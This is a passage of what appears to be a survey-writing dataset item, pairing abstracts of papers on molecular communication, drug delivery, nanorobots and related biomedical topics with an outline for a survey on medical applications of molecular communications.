as a biochemical barrier that produces a local inhibitor of bFGF activity. To better define the role of the intact endothelium in modulating the vascular and tissue deposition of bFGF, we compared the fate of intravenous injections of 125I-labeled bFGF with perivascular controlled growth factor release. Peak serum bFGF levels were detected within 1 min of injection, and the growth factor was cleared thereafter with a serum half-life of almost 3 min. Polymeric controlled release devices delivered bFGF to the extravascular space without transendothelial transport. Deposition within the blood vessel wall was rapidly distributed circumferentially and was substantially greater than that observed following intravenous injection. The amount of bFGF deposited in arteries adjacent to the release devices was 40 times that deposited in similar arteries in animals who received a single intravenous bolus of bFGF. Endothelial denudation had a minimal effect on deposition following perivascular release, and it increased deposition following intravenous delivery 2-fold. The presence of intimal hyperplasia increased deposition of perivascularly released bFGF 2.4-fold but decreased the deposition of intravenously injected bFGF by 67%. In contrast, bFGF was 5- to 30-fold more abundant in solid organs after intravenous injection than it was following perivascular release. Deposition was greatest in the kidney, liver, and spleen and was substantially lower in the heart and lung. Thus, bFGF is rapidly cleared following intravenous injection and is deposited within both solid organs and the walls of blood vessels. Unlike the mitogenic potential of bFGF within blood vessels, vascular deposition is virtually independent of the presence of endothelium. 
Perivascular delivery is far more efficient than intravenous delivery at depositing bFGF within the arterial wall, and an increased neointima may provide added substrate for potential bFGF deposition but has limited contact with intravascular growth factor as a result of dilutional and flow-mediated effects. --- paper_title: Molecular Communication and Networking: Opportunities and Challenges paper_content: The ability of engineered biological nanomachines to communicate with biological systems at the molecular level is anticipated to enable future applications such as monitoring the condition of a human body, regenerating biological tissues and organs, and interfacing artificial devices with neural systems. From the viewpoint of communication theory and engineering, molecular communication is proposed as a new paradigm for engineered biological nanomachines to communicate with the natural biological nanomachines which form a biological system. Distinct from the current telecommunication paradigm, molecular communication uses molecules as the carriers of information; sender biological nanomachines encode information on molecules and release the molecules in the environment, the molecules then propagate in the environment to receiver biological nanomachines, and the receiver biological nanomachines biochemically react with the molecules to decode information. Current molecular communication research is limited to small-scale networks of several biological nanomachines. Key challenges to bridge the gap between current research and practical applications include developing robust and scalable techniques to create a functional network from a large number of biological nanomachines. Developing networking mechanisms and communication protocols is anticipated to introduce new avenues into integrating engineered and natural biological nanomachines into a single networked system. In this paper, we present the state-of-the-art in the area of molecular communication by discussing its architecture, features, applications, design, engineering, and physical modeling. We then discuss challenges and opportunities in developing networking mechanisms and communication protocols to create a network from a large number of bio-nanomachines for future applications. --- paper_title: Cellular-Level Surgery Using Nano Robots paper_content: The atomic force microscope (AFM) is a popular instrument for studying the nano world. AFM is naturally suitable for imaging living samples and measuring mechanical properties. In this article, we propose a new concept of an AFM-based nano robot that can be applied for cellular-level surgery on living samples. The nano robot has multiple functions of imaging, manipulation, characterizing mechanical properties, and tracking. In addition, the technique of tip functionalization allows the nano robot the ability for precisely delivering a drug locally. Therefore, the nano robot can be used for conducting complicated nano surgery on living samples, such as cells and bacteria. Moreover, to provide a user-friendly interface, the software in this nano robot provides a “videolized” visual feedback for monitoring the dynamic changes on the sample surface. Both the operation of nano surgery and observation of the surgery results can be simultaneously achieved. This nano robot can be easily integrated with extra modules that have the potential applications of characterizing other properties of samples such as local conductance and capacitance. 
--- paper_title: Investigating bioconjugation by atomic force microscopy paper_content: Nanotechnological applications increasingly exploit the selectivity and processivity of biological molecules. Integration of biomolecules such as proteins or DNA into nano-systems typically requires their conjugation to surfaces, for example of carbon-nanotubes or fluorescent quantum dots. The bioconjugated nanostructures exploit the unique strengths of both their biological and nanoparticle components and are used in diverse, future oriented research areas ranging from nanoelectronics to biosensing and nanomedicine. Atomic force microscopy imaging provides valuable, direct insight for the evaluation of different conjugation approaches at the level of the individual molecules. Recent technical advances have enabled high speed imaging by AFM supporting time resolutions sufficient to follow conformational changes of intricately assembled nanostructures in solution. In addition, integration of AFM with different spectroscopic and imaging approaches provides an enhanced level of information on the investigated sample. Furthermore, the AFM itself can serve as an active tool for the assembly of nanostructures based on bioconjugation. AFM is hence a major workhorse in nanotechnology; it is a powerful tool for the structural investigation of bioconjugation and bioconjugation-induced effects as well as the simultaneous active assembly and analysis of bioconjugation-based nanostructures. --- paper_title: Remote electronic control of DNA hybridization through inductive coupling to an attached metal nanocrystal antenna paper_content: Increasingly detailed structural1 and dynamic2,3 studies are highlighting the precision with which biomolecules execute often complex tasks at the molecular scale. The efficiency and versatility of these processes have inspired many attempts to mimic or harness them. To date, biomolecules have been used to perform computational operations4 and actuation5, to construct artificial transcriptional loops that behave like simple circuit elements6,7 and to direct the assembly of nanocrystals8. Further development of these approaches requires new tools for the physical and chemical manipulation of biological systems. Biomolecular activity has been triggered optically through the use of chromophores9,10,11,12,13,14, but direct electronic control over biomolecular ‘machinery’ in a specific and fully reversible manner has not yet been achieved. Here we demonstrate remote electronic control over the hybridization behaviour of DNA molecules, by inductive coupling of a radio-frequency magnetic field to a metal nanocrystal covalently linked to DNA15. Inductive coupling to the nanocrystal increases the local temperature of the bound DNA, thereby inducing denaturation while leaving surrounding molecules relatively unaffected. Moreover, because dissolved biomolecules dissipate heat in less than 50 picoseconds (ref. 16), the switching is fully reversible. Inductive heating of macroscopic samples is widely used17,18,19, but the present approach should allow extension of this concept to the control of hybridization and thus of a broad range of biological functions on the molecular scale. --- paper_title: A genetically encoded photoactivatable Rac controls the motility of living cells paper_content: The precise spatiotemporal dynamics of protein activity remain poorly understood, yet they can be critical in determining cell behaviour. 
A genetically encoded, photoactivatable version of the protein Rac1, a key GTPase regulating actin cytoskeletal dynamics, has now been produced; this approach enables the manipulation of the activity of Rac1 at precise times and places within a living cell, thus controlling motility. --- paper_title: Cationic thermosensitive liposomes: A novel dual targeted heat-triggered drug delivery approach for endothelial and tumor cells paper_content: Developing selectively targeted and heat-responsive nanocarriers holds paramount promises in chemotherapy. We show that this can be achieved by designing liposomes combining cationic charged and thermosensitive lipids in the bilayer. We demonstrated, using flow cytometry, live cell imaging, and intravital optical imaging, that cationic thermosensitive liposomes specifically target angiogenic endothelial and tumor cells. Application of mild hyperthermia led to a rapid content release extra- and intracellularly in two crucial cell types in a solid tumor. --- paper_title: Externally Controllable Molecular Communication paper_content: In molecular communication, a group of biological nanomachines communicates through exchanging molecules and collectively performs application dependent tasks. An open research issue in molecular communication is to establish interfaces to interconnect the molecular communication environment (e.g., inside the human body) and its external environment (e.g., outside the human body). Such interfaces allow conventional devices in the external environment to control the location and timing of molecular communication processes in the molecular communication environment and expand the capability of molecular communication. In this paper, we first describe an architecture of externally controllable molecular communication and introduce two types of interfaces for biological nanomachines; bio-nanomachine to bio-nanomachine interfaces (BNIs) for bio-nanomachines to interact with other biological nanomachines in the molecular communication environment, and inmessaging and outmessaging interfaces (IMIs and OMIs) for bio-nanomachines to interact with devices in the external environment. We then describe a proof-of- concept design and wet laboratory implementation of the IMI and OMI, using biological cells. We further demonstrate, through mathematical modeling and numerical experiments, how an architecture of externally controllable molecular communication with BNIs and IMIs/OMIs may apply to pattern formation, a promising nanomedical application of molecular communication. --- paper_title: A Molecular Communication System in Blood Vessels for Tumor Detection paper_content: This paper shows a proposal of a biological nano-communication system established in a blood vessel, aiming to support the detection and treatment of tumors. This system could either be used for diagnostic purposes in the early stage of a disease or to check any relapse of a previous disease already treated. In our proposal, the tumor detection happens through revealing tumor biomarkers on the cell surface, such as the CD47 protein. This detection takes advantage of some recent proposal if implementing nanorobot transport systems through modified flagellated bacteria. When a biomarker is detected, a molecular communication system is used for distributing the information over a number of nano-machines. These machines have a size similar to the white blood cells, so that they can flow through the vessel at the speed of the largest particles. 
The transported information is detected outside the body through the use of smart probes, which triggers a decision tree in order to estimate the nature of the tumor and its most likely location. --- paper_title: Design and Analysis of Wireless Communication Systems Using Diffusion-Based Molecular Communication Among Bacteria paper_content: The design of biologically-inspired wireless communication systems using bacteria as the basic element of the system is initially motivated by a phenomenon called Quorum Sensing. Due to high randomness in the individual behavior of a bacterium, reliable communication between two bacteria is almost impossible. Therefore, we have recently proposed that a population of bacteria in a cluster be considered as a bio node in the network capable of molecular transmission and reception. This proposition enables us to form a reliable bio node out of many unreliable bacteria. In this paper, we study the communication between two nodes in such a network where information is encoded in the concentration of molecules by the transmitter. The molecules produced by the bacteria in the transmitter node propagate through the diffusion channel. Then, the concentration of molecules is sensed by the bacteria population in the receiver node, which would decode the information and output light or fluorescence as a result. The uncertainty in the communication is caused by all three components of communication, i.e., transmission, propagation and reception. We study the theoretical limits of the information transfer rate in the presence of such uncertainties. Finally, we consider M-ary signaling schemes and study their achievable rates and corresponding error probabilities. --- paper_title: Caged compounds: photorelease technology for control of cellular chemistry and physiology paper_content: Caged compounds are light-sensitive probes that functionally encapsulate biomolecules in an inactive form. Irradiation liberates the trapped molecule, permitting targeted perturbation of a biological process. Uncaging technology and fluorescence microscopy are 'optically orthogonal': the former allows control, and the latter, observation of cellular function. Used in conjunction with other technologies (for example, patch clamp and/or genetics), the light beam becomes a uniquely powerful tool to stimulate a selected biological target in space or time. Here I describe important examples of widely used caged compounds, their design features and synthesis, as well as practical details of how to use them with living cells. --- paper_title: Modeling of Pathological Traits in Alzheimer's Disease Based on Systemic Extracellular Signaling Proteome paper_content: The study of chronic brain diseases including Alzheimer's disease in patients is typically limited to brain imaging or psychometric testing. Given the epidemic rise and insufficient knowledge about pathological pathways in sporadic Alzheimer's disease, new tools are required to identify the molecular changes underlying this disease. We hypothesize that levels of specific secreted cellular signaling proteins in cerebrospinal fluid or plasma correlate with pathological changes in the Alzheimer's disease brain and can thus be used to discover signaling pathways altered in the disease. Here we measured 91 proteins of this subset of the cellular communication proteome in plasma or cerebrospinal fluid in patients with Alzheimer's disease and cognitively normal controls to mathematically model disease-specific molecular traits.
We found small numbers of signaling proteins that were able to model key pathological markers of Alzheimer's disease, including levels of cerebrospinal fluid β-amyloid and tau, and classify disease in independent samples. Several of these factors had previously been implicated in Alzheimer's disease, supporting the validity of our approach. Our study also points to proteins which were previously unknown to be associated with Alzheimer's disease, thereby implicating novel signaling pathways in this disorder. --- paper_title: Universal computing by DNA origami robots in a living animal paper_content: Nanoscale robots made from DNA origami can dynamically interact with each other and perform logic computations in a living animal. --- paper_title: CRISPR interference: RNA-directed adaptive immunity in bacteria and archaea paper_content: Sequence-directed genetic interference pathways control gene expression and preserve genome integrity in all kingdoms of life. The importance of such pathways is highlighted by the extensive study of RNA interference (RNAi) and related processes in eukaryotes. In many bacteria and most archaea, clustered, regularly interspaced short palindromic repeats (CRISPRs) are involved in a more recently discovered interference pathway that protects cells from bacteriophages and conjugative plasmids. CRISPR sequences provide an adaptive, heritable record of past infections and express CRISPR RNAs, small RNAs that target invasive nucleic acids. Here, we review the mechanisms of CRISPR interference and its roles in microbial physiology and evolution. We also discuss potential applications of this novel interference pathway. --- paper_title: Short-Range Exosomal Transfer of Viral RNA from Infected Cells to Plasmacytoid Dendritic Cells Triggers Innate Immunity paper_content: Viral nucleic acids often trigger an innate immune response in infected cells. Many viruses, including hepatitis C virus (HCV), have evolved mechanisms to evade intracellular recognition. Nevertheless, HCV-permissive cells can trigger a viral RNA-, TLR7-, and cell-contact-dependent compensatory interferon response in nonpermissive plasmacytoid dendritic cells (pDCs). Here we report that these events are mediated by transfer of HCV-RNA-containing exosomes from infected cells to pDCs. The exosomal viral RNA transfer is dependent on the endosomal sorting complex required for transport (ESCRT) machinery and on Annexin A2, an RNA-binding protein involved in membrane vesicle trafficking, and is suppressed by exosome release inhibitors. Further, purified concentrated HCV-RNA-containing exosomes are sufficient to activate pDCs. Thus, vesicular sequestration and exosomal export of viral RNA may serve both as a viral strategy to evade pathogen sensing within infected cells and as a host strategy to induce an unopposed innate response in replication-nonpermissive bystander cells. --- paper_title: Extracellular vesicles: biology and emerging therapeutic opportunities paper_content: Within the past decade, extracellular vesicles have emerged as important mediators of intercellular communication, being involved in the transmission of biological signals between cells in both prokaryotes and higher eukaryotes to regulate a diverse range of biological processes.
In addition, pathophysiological roles for extracellular vesicles are beginning to be recognized in diseases including cancer, infectious diseases and neurodegenerative disorders, highlighting potential novel targets for therapeutic intervention. Moreover, both unmodified and engineered extracellular vesicles are likely to have applications in macromolecular drug delivery. Here, we review recent progress in understanding extracellular vesicle biology and the role of extracellular vesicles in disease, discuss emerging therapeutic opportunities and consider the associated challenges. --- paper_title: Self-Folding Thermo-Magnetically Responsive Soft Microgrippers paper_content: Hydrogels such as poly(N-isopropylacrylamide-co-acrylic acid) (pNIPAM-AAc) can be photopatterned to create a wide range of actuatable and self-folding microstructures. Mechanical motion is derived from the large and reversible swelling response of this cross-linked hydrogel in varying thermal or pH environments. This action is facilitated by their network structure and capacity for large strain. However, due to the low modulus of such hydrogels, they have limited gripping ability of relevance to surgical excision or robotic tasks such as pick-and-place. Using experiments and modeling, we design, fabricate, and characterize photopatterned, self-folding functional microgrippers that combine a swellable, photo-cross-linked pNIPAM-AAc soft-hydrogel with a nonswellable and stiff segmented polymer (polypropylene fumarate, PPF). We also show that we can embed iron oxide (Fe2O3) nanoparticles into the porous hydrogel layer, allowing the microgrippers to be responsive and remotely guided using magnetic fields. Usi... ---
Title: Applications of molecular communications to medicine: a survey
Section 1: Introduction
Description 1: Introduce the concept of molecular communications and the significance of their application in medicine.
Section 2: Diagnostic Applications
Description 2: Illustrate some applications proposed for diagnostic purposes, including disease detection, personalized diagnosis, and imaging techniques.
Section 3: Treatment of Diseases
Description 3: Describe applications for advanced treatments, focusing on disease treatment methodologies such as drug delivery, virus-based techniques, bacteria-based techniques, nanorobots, antibody-based techniques, QD and FRET-based techniques, immune system activation, tissue engineering, and nanosurgery.
Section 4: Implementation Mechanisms and Interfaces
Description 4: Present the current mechanisms and interfaces being studied and developed for implementing molecular communication systems in medical applications, and discuss how they interconnect the nanoscale biological environment with external devices and systems.
Section 5: Future Research Challenges
Description 5: Identify the future research challenges of molecular communications for medical purposes.
Section 6: Conclusion
Description 6: Summarize the surveyed medical applications developed through molecular communications and potential future directions.